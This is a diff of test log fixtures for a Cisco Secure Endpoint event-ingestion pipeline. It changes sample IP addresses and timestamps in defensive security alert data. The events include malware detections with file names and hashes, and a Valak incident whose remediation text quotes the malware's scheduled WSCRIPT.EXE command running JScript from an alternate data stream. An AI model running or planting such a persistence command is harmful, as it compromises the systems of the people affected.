Office\",\"version\":\"2016\",\"cve\":\"CVE-2017-0106\",\"score\":\"9.3\",\"url\":\"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2017-0106\"},{\"cve\":\"CVE-2017-11774\",\"score\":\"6.8\",\"url\":\"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2017-11774\"},{\"cve\":\"CVE-2017-8506\",\"score\":\"9.3\",\"url\":\"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2017-8506\"},{\"cve\":\"CVE-2017-8507\",\"score\":\"9.3\",\"url\":\"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2017-8507\"},{\"cve\":\"CVE-2017-8571\",\"score\":\"6.8\",\"url\":\"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2017-8571\"},{\"cve\":\"CVE-2017-8663\",\"score\":\"9.3\",\"url\":\"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2017-8663\"},{\"cve\":\"CVE-2018-0791\",\"score\":\"9.3\",\"url\":\"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2018-0791\"}]}}", "code": "1107296279", "kind": "alert", "start": "2020-12-25T04:32:53.000Z", 
@@ -3833,7 +3833,7 @@
 }
 ],
 "connector_guid": "test_connector_guid",
- "external_ip": "8.8.8.8"
+ "external_ip": "81.2.69.144"
 },
 "file": {
 "parent": {
@@ -3917,7 +3917,7 @@
 "Demo_AMP_Intel"
 ],
 "ip": [
- "8.8.8.8",
+ "81.2.69.144",
 "10.10.10.10"
 ]
 },
@@ -3927,8 +3927,8 @@ }, "event": { "severity": 0, - "ingested": "2021-09-30T00:13:59.322521941Z", - "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6525498672153625000,\"timestamp\":1608870165,\"timestamp_nanoseconds\":878000000,\"date\":\"2020-12-25T04:22:45+00:00\",\"event_type\":\"Policy Update\",\"event_type_id\":553648130,\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_AMP_Intel\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"e6:44:a0:56:f3:9a\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}}}}", + "ingested": "2021-12-09T13:35:29.222647400Z", + "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6525498672153625000,\"timestamp\":1608870165,\"timestamp_nanoseconds\":878000000,\"date\":\"2020-12-25T04:22:45+00:00\",\"event_type\":\"Policy 
Update\",\"event_type_id\":553648130,\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_AMP_Intel\",\"external_ip\":\"81.2.69.144\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"e6:44:a0:56:f3:9a\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}}}}", "code": "553648130", "kind": "alert", "action": "Policy Update", @@ -3945,7 +3945,7 @@ } ], "connector_guid": "test_connector_guid", - "external_ip": "8.8.8.8" + "external_ip": "81.2.69.144" }, "connector_guid": "test_connector_guid", "related": { @@ -3973,7 +3973,7 @@ "Demo_AMP_Intel" ], "ip": [ - "8.8.8.8", + "81.2.69.144", "10.10.10.10" ] }, 
@@ -3983,8 +3983,8 @@ }, "event": { "severity": 0, - "ingested": "2021-09-30T00:13:59.322524139Z", - "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6525494703603843000,\"timestamp\":1608869241,\"timestamp_nanoseconds\":928000000,\"date\":\"2020-12-25T04:07:21+00:00\",\"event_type\":\"Scan Completed, No Detections\",\"event_type_id\":554696715,\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_AMP_Intel\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"e6:44:a0:56:f3:9a\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"scan\":{\"description\":\"Flash Scan\",\"clean\":true,\"scanned_files\":2872,\"scanned_processes\":49,\"scanned_paths\":0,\"malicious_detections\":0}}}", + "ingested": "2021-12-09T13:35:29.222651900Z", + "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6525494703603843000,\"timestamp\":1608869241,\"timestamp_nanoseconds\":928000000,\"date\":\"2020-12-25T04:07:21+00:00\",\"event_type\":\"Scan Completed, No 
Detections\",\"event_type_id\":554696715,\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_AMP_Intel\",\"external_ip\":\"81.2.69.144\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"e6:44:a0:56:f3:9a\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"scan\":{\"description\":\"Flash Scan\",\"clean\":true,\"scanned_files\":2872,\"scanned_processes\":49,\"scanned_paths\":0,\"malicious_detections\":0}}}", "code": "554696715", "kind": "alert", "action": "Scan Completed, No Detections", @@ -4009,7 +4009,7 @@ } ], "connector_guid": "test_connector_guid", - "external_ip": "8.8.8.8" + "external_ip": "81.2.69.144" }, "connector_guid": "test_connector_guid", "related": { @@ -4037,7 +4037,7 @@ "Demo_AMP_Intel" ], "ip": [ - "8.8.8.8", + "81.2.69.144", "10.10.10.10" ] }, 
@@ -4047,8 +4047,8 @@ }, "event": { "severity": 0, - "ingested": "2021-09-30T00:13:59.322526324Z", - "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6525494527510184000,\"timestamp\":1608869200,\"timestamp_nanoseconds\":537000000,\"date\":\"2020-12-25T04:06:40+00:00\",\"event_type\":\"Scan Started\",\"event_type_id\":554696714,\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_AMP_Intel\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"e6:44:a0:56:f3:9a\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"scan\":{\"description\":\"Flash Scan\"}}}", + "ingested": "2021-12-09T13:35:29.222675100Z", + "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6525494527510184000,\"timestamp\":1608869200,\"timestamp_nanoseconds\":537000000,\"date\":\"2020-12-25T04:06:40+00:00\",\"event_type\":\"Scan 
Started\",\"event_type_id\":554696714,\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_AMP_Intel\",\"external_ip\":\"81.2.69.144\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"e6:44:a0:56:f3:9a\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"scan\":{\"description\":\"Flash Scan\"}}}", "code": "554696714", "kind": "alert", "action": "Scan Started", @@ -4068,7 +4068,7 @@ } ], "connector_guid": "test_connector_guid", - "external_ip": "8.8.8.8" + "external_ip": "81.2.69.144" }, "connector_guid": "test_connector_guid", "related": { diff --git a/packages/cisco_secure_endpoint/data_stream/event/_dev/test/pipeline/test-cisco-amp2.log b/packages/cisco_secure_endpoint/data_stream/event/_dev/test/pipeline/test-cisco-amp2.log index ae6c21d78ff..35b4789fba9 100644 --- a/packages/cisco_secure_endpoint/data_stream/event/_dev/test/pipeline/test-cisco-amp2.log +++ b/packages/cisco_secure_endpoint/data_stream/event/_dev/test/pipeline/test-cisco-amp2.log 
@@ -1,42 +1,42 @@ -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"timestamp":1610711992,"timestamp_nanoseconds":155518026,"date":"2021-01-15T11:59:52+00:00","event_type":"SecureX Threat Hunting Incident","event_type_id":1107296344,"connector_guid":"test_connector_guid","severity":"Critical","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Threat_Hunting","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"87:c2:d9:a2:8c:74"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"threat_hunting":{"incident_report_guid":"6e5292d5-248c-49dc-839d-201bcba64562","incident_hunt_guid":"4bdbaf20-020f-4bb5-9da9-585da0e07817","incident_title":"Valak Variant","incident_summary":"The host Demo_Threat_Hunting is compromised by a Valak malware variant. Valak is a multi-stage malware attack that uses screen capture, reconnaissance, geolocation, and fileless execution techniques to infiltrate and exfiltrate sensitive information. 
Based on the event details listed and the techniques used, we recommend the host in question be investigated further.","incident_remediation":"We recommend the following:\r\n\r\n- Isolation of the affected hosts from the network\r\n- Perform forensic investigation\r\n - Review all activity performed by the user\r\n - Upload any suspicious files to ThreatGrid for analysis\r\n - Search the registry for data \"var config = ( COMMAND_C2\" and remove the key\r\n - Review scheduled tasks and cancel any involving the execution of WSCRIPT.EXE //E:jscript C:\\Users\\Public\\PowerManagerSpm.jar:LocalZone lqjsxokgowhbxjaetyrifnbigtcxmuj eimljujnv\r\n - Remove the Alternate Data Stream file located C:\\Users\\Public\\PowerManagerSpm.jar:LocalZone.\r\n- If possible, reimage the affected system to prevent potential unknown persistence methods.","incident_id":416,"tactics":[{"name":"Defense Evasion","description":"

The adversary is trying to avoid being detected.

\n\n

Defense Evasion consists of techniques that adversaries use to avoid detection throughout their compromise. Techniques used for defense evasion include uninstalling/disabling security software or obfuscating/encrypting data and scripts. Adversaries also leverage and abuse trusted processes to hide and masquerade their malware. Other tactics’ techniques are cross-listed here when those techniques include the added benefit of subverting defenses.

\n","external_id":"TA0005","mitre_name":"tactic","mitre_url":"https://attack.mitre.org/tactics/TA0005"}],"techniques":[{"name":"Data from Local System","description":"

Adversaries may search local system sources, such as file systems or local databases, to find files of interest and sensitive data prior to Exfiltration.

\n\n

Adversaries may do this using a Command and Scripting Interpreter, such as cmd, which has functionality to interact with the file system to gather information. Some adversaries may also use Automated Collection on the local system.

\n","external_id":"T1005","mitre_name":"technique","mitre_url":"https://attack.mitre.org/techniques/T1005","tactics_names":"Collection","platforms":"Linux, macOS, Windows","system_requirements":"Privileges to access certain files and directories","permissions":"","data_sources":"File monitoring, Process monitoring, Process command-line parameters"},{"name":"Scheduled Task/Job","description":"

Adversaries may abuse task scheduling functionality to facilitate initial or recurring execution of malicious code. Utilities exist within all major operating systems to schedule programs or scripts to be executed at a specified date and time. A task can also be scheduled on a remote system, provided the proper authentication is met (ex: RPC and file and printer sharing in Windows environments). Scheduling a task on a remote system typically requires being a member of an admin or otherwise privileged group on the remote system.(Citation: TechNet Task Scheduler Security)

\n\n

Adversaries may use task scheduling to execute programs at system startup or on a scheduled basis for persistence. These mechanisms can also be abused to run a process under the context of a specified account (such as one with elevated permissions/privileges).

\n","external_id":"T1053","mitre_name":"technique","mitre_url":"https://attack.mitre.org/techniques/T1053","tactics_names":"Execution, Persistence, Privilege Escalation","platforms":"Windows, Linux, macOS","system_requirements":null,"permissions":"Administrator, SYSTEM, User","data_sources":"File monitoring, Process monitoring, Process command-line parameters, Windows event logs"},{"name":"Scripting","description":"

This technique has been deprecated. Please use Command and Scripting Interpreter where appropriate.

\n\n

Adversaries may use scripts to aid in operations and perform multiple actions that would otherwise be manual. Scripting is useful for speeding up operational tasks and reducing the time required to gain access to critical resources. Some scripting languages may be used to bypass process monitoring mechanisms by directly interacting with the operating system at an API level instead of calling other programs. Common scripting languages for Windows include VBScript and PowerShell but could also be in the form of command-line batch scripts.

\n\n

Scripts can be embedded inside Office documents as macros that can be set to execute when files used in Spearphishing Attachment and other types of spearphishing are opened. Malicious embedded macros are an alternative means of execution than software exploitation through Exploitation for Client Execution, where adversaries will rely on macros being allowed or that the user will accept to activate them.

\n\n

Many popular offensive frameworks exist which use forms of scripting for security testers and adversaries alike. Metasploit (Citation: Metasploit_Ref), Veil (Citation: Veil_Ref), and PowerSploit (Citation: Powersploit) are three examples that are popular among penetration testers for exploit and post-compromise operations and include many features for evading defenses. Some adversaries are known to use PowerShell. (Citation: Alperovitch 2014)

\n","external_id":"T1064","mitre_name":"technique","mitre_url":"https://attack.mitre.org/techniques/T1064","tactics_names":"Defense Evasion, Execution","platforms":"Linux, macOS, Windows","system_requirements":null,"permissions":"User","data_sources":"Process monitoring, File monitoring, Process command-line parameters"}],"severity":"critical","incident_start_time":1610707688,"incident_end_time":1592478770},"tactics":[{"name":"Defense Evasion","description":"

The adversary is trying to avoid being detected.

\n\n

Defense Evasion consists of techniques that adversaries use to avoid detection throughout their compromise. Techniques used for defense evasion include uninstalling/disabling security software or obfuscating/encrypting data and scripts. Adversaries also leverage and abuse trusted processes to hide and masquerade their malware. Other tactics’ techniques are cross-listed here when those techniques include the added benefit of subverting defenses.

\n","external_id":"TA0005","mitre_name":"tactic","mitre_url":"https://attack.mitre.org/tactics/TA0005"}],"techniques":[{"name":"Data from Local System","description":"

Adversaries may search local system sources, such as file systems or local databases, to find files of interest and sensitive data prior to Exfiltration.

\n\n

Adversaries may do this using a Command and Scripting Interpreter, such as cmd, which has functionality to interact with the file system to gather information. Some adversaries may also use Automated Collection on the local system.

\n","external_id":"T1005","mitre_name":"technique","mitre_url":"https://attack.mitre.org/techniques/T1005","tactics_names":"Collection","platforms":"Linux, macOS, Windows","system_requirements":"Privileges to access certain files and directories","permissions":"","data_sources":"File monitoring, Process monitoring, Process command-line parameters"},{"name":"Scheduled Task/Job","description":"

Adversaries may abuse task scheduling functionality to facilitate initial or recurring execution of malicious code. Utilities exist within all major operating systems to schedule programs or scripts to be executed at a specified date and time. A task can also be scheduled on a remote system, provided the proper authentication is met (ex: RPC and file and printer sharing in Windows environments). Scheduling a task on a remote system typically requires being a member of an admin or otherwise privileged group on the remote system.(Citation: TechNet Task Scheduler Security)

\n\n

Adversaries may use task scheduling to execute programs at system startup or on a scheduled basis for persistence. These mechanisms can also be abused to run a process under the context of a specified account (such as one with elevated permissions/privileges).

\n","external_id":"T1053","mitre_name":"technique","mitre_url":"https://attack.mitre.org/techniques/T1053","tactics_names":"Execution, Persistence, Privilege Escalation","platforms":"Windows, Linux, macOS","system_requirements":null,"permissions":"Administrator, SYSTEM, User","data_sources":"File monitoring, Process monitoring, Process command-line parameters, Windows event logs"},{"name":"Scripting","description":"

This technique has been deprecated. Please use Command and Scripting Interpreter where appropriate.

\n\n

Adversaries may use scripts to aid in operations and perform multiple actions that would otherwise be manual. Scripting is useful for speeding up operational tasks and reducing the time required to gain access to critical resources. Some scripting languages may be used to bypass process monitoring mechanisms by directly interacting with the operating system at an API level instead of calling other programs. Common scripting languages for Windows include VBScript and PowerShell but could also be in the form of command-line batch scripts.

\n\n

Scripts can be embedded inside Office documents as macros that can be set to execute when files used in Spearphishing Attachment and other types of spearphishing are opened. Malicious embedded macros are an alternative means of execution than software exploitation through Exploitation for Client Execution, where adversaries will rely on macros being allowed or that the user will accept to activate them.

\n\n

Many popular offensive frameworks exist which use forms of scripting for security testers and adversaries alike. Metasploit (Citation: Metasploit_Ref), Veil (Citation: Veil_Ref), and PowerSploit (Citation: Powersploit) are three examples that are popular among penetration testers for exploit and post-compromise operations and include many features for evading defenses. Some adversaries are known to use PowerShell. (Citation: Alperovitch 2014)

\n","external_id":"T1064","mitre_name":"technique","mitre_url":"https://attack.mitre.org/techniques/T1064","tactics_names":"Defense Evasion, Execution","platforms":"Linux, macOS, Windows","system_requirements":null,"permissions":"User","data_sources":"Process monitoring, File monitoring, Process command-line parameters"}]}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6180352115244794000,"timestamp":1610709638,"timestamp_nanoseconds":279000000,"date":"2021-01-15T11:20:38+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.GenericKD:ZVETJ.18gs.1201","detection_id":"6180352115244793858","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Upatre","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"e1:e5:94:ea:a5:44"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"wsymqyv90.exe","file_path":"\\\\?\\C:\\Users\\Administrator\\AppData\\Local\\Temp\\OUTLOOK_TEMP\\wsymqyv90.exe","identity":{"sha256":"b630e72639cc7340620adb0cfc26332ec52fe8867b769695f2d25718d68b1b40","sha1":"70aef829bec17195e6c8ec0e6cba0ed39f97ba48","md5":"e2f5dcd966e26d54329e8d79c7201652"},"parent":{"process_id":4040,"disposition":"Clean","file_name":"iexplore.exe","identity":{"sha256":"b4e5c2775de098946b4e11aba138b89d42b88c1dbd4d5ec879ef6919bf018132","sha1":"8de30174cebc8732f1ba961e7d93fe5549495a80","md5":"b3581f426dc500a51091cdd5bacf0454"}}}}} 
-{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6180351977805840000,"timestamp":1610709606,"timestamp_nanoseconds":548000000,"date":"2021-01-15T11:20:06+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.GenericKD:ZVETJ.18gs.1201","detection_id":"6180351977805840385","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Upatre","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"e1:e5:94:ea:a5:44"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"wsymqyv90.exe","file_path":"\\\\?\\C:\\Users\\Administrator\\AppData\\Local\\Temp\\OUTLOOK_TEMP\\wsymqyv90.exe","identity":{"sha256":"b630e72639cc7340620adb0cfc26332ec52fe8867b769695f2d25718d68b1b40","sha1":"70aef829bec17195e6c8ec0e6cba0ed39f97ba48","md5":"e2f5dcd966e26d54329e8d79c7201652"},"parent":{"process_id":4040,"disposition":"Clean","file_name":"iexplore.exe","identity":{"sha256":"b4e5c2775de098946b4e11aba138b89d42b88c1dbd4d5ec879ef6919bf018132","sha1":"8de30174cebc8732f1ba961e7d93fe5549495a80","md5":"b3581f426dc500a51091cdd5bacf0454"}}}}} 
-{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6159258594551267000,"timestamp":1610707507,"timestamp_nanoseconds":525000000,"date":"2021-01-15T10:45:07+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.DFC.MalParent","detection_id":"6159258594551267599","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_TeslaCrypt","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"90:61:b5:c9:13:79"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"iodnxvg.exe","file_path":"\\\\?\\C:\\Users\\Administrator\\AppData\\Roaming\\iodnxvg.exe","identity":{"sha256":"3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370","sha1":"e654d39cd13414b5151e8cf0d8f5b166dddd45cb","md5":"209a288c68207d57e0ce6e60ebf60729"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6180341055704007000,"timestamp":1610707063,"timestamp_nanoseconds":978000000,"date":"2021-01-15T10:37:43+00:00","event_type":"DFC Threat 
Detected","event_type_id":1090519084,"detection":"DFC.CustomIPList","detection_id":"6180341055704006662","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Upatre","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"e1:e5:94:ea:a5:44"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"network_info":{"remote_ip":"8.8.4.4","remote_port":443,"local_ip":"10.10.0.0","local_port":55810,"nfm":{"direction":"Outgoing connection from","protocol":"TCP"},"parent":{"process_id":3136,"disposition":"Clean","file_name":"iexplore.exe","identity":{"sha256":"b4e5c2775de098946b4e11aba138b89d42b88c1dbd4d5ec879ef6919bf018132","sha1":"8de30174cebc8732f1ba961e7d93fe5549495a80","md5":"b3581f426dc500a51091cdd5bacf0454"}}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6180341055704007000,"timestamp":1610707063,"timestamp_nanoseconds":978000000,"date":"2021-01-15T10:37:43+00:00","event_type":"DFC Threat 
Detected","event_type_id":1090519084,"detection":"DFC.CustomIPList","detection_id":"6180341055704006657","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Upatre","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"e1:e5:94:ea:a5:44"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"network_info":{"remote_ip":"8.8.4.4","remote_port":443,"local_ip":"10.10.0.0","local_port":55805,"nfm":{"direction":"Outgoing connection from","protocol":"TCP"},"parent":{"process_id":3136,"disposition":"Clean","file_name":"iexplore.exe","identity":{"sha256":"b4e5c2775de098946b4e11aba138b89d42b88c1dbd4d5ec879ef6919bf018132","sha1":"8de30174cebc8732f1ba961e7d93fe5549495a80","md5":"b3581f426dc500a51091cdd5bacf0454"}}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6180341055704007000,"timestamp":1610707063,"timestamp_nanoseconds":947000000,"date":"2021-01-15T10:37:43+00:00","event_type":"DFC Threat 
Detected","event_type_id":1090519084,"detection":"DFC.CustomIPList","detection_id":"6180341055704006661","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Upatre","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"e1:e5:94:ea:a5:44"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"network_info":{"remote_ip":"8.8.4.4","remote_port":443,"local_ip":"10.10.0.0","local_port":55809,"nfm":{"direction":"Outgoing connection from","protocol":"TCP"},"parent":{"process_id":3136,"disposition":"Clean","file_name":"iexplore.exe","identity":{"sha256":"b4e5c2775de098946b4e11aba138b89d42b88c1dbd4d5ec879ef6919bf018132","sha1":"8de30174cebc8732f1ba961e7d93fe5549495a80","md5":"b3581f426dc500a51091cdd5bacf0454"}}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6180341055704007000,"timestamp":1610707063,"timestamp_nanoseconds":931000000,"date":"2021-01-15T10:37:43+00:00","event_type":"DFC Threat 
Detected","event_type_id":1090519084,"detection":"DFC.CustomIPList","detection_id":"6180341055704006660","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Upatre","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"e1:e5:94:ea:a5:44"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"network_info":{"remote_ip":"8.8.4.4","remote_port":443,"local_ip":"10.10.0.0","local_port":55808,"nfm":{"direction":"Outgoing connection from","protocol":"TCP"},"parent":{"process_id":3136,"disposition":"Clean","file_name":"iexplore.exe","identity":{"sha256":"b4e5c2775de098946b4e11aba138b89d42b88c1dbd4d5ec879ef6919bf018132","sha1":"8de30174cebc8732f1ba961e7d93fe5549495a80","md5":"b3581f426dc500a51091cdd5bacf0454"}}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6180341055704007000,"timestamp":1610707063,"timestamp_nanoseconds":900000000,"date":"2021-01-15T10:37:43+00:00","event_type":"DFC Threat 
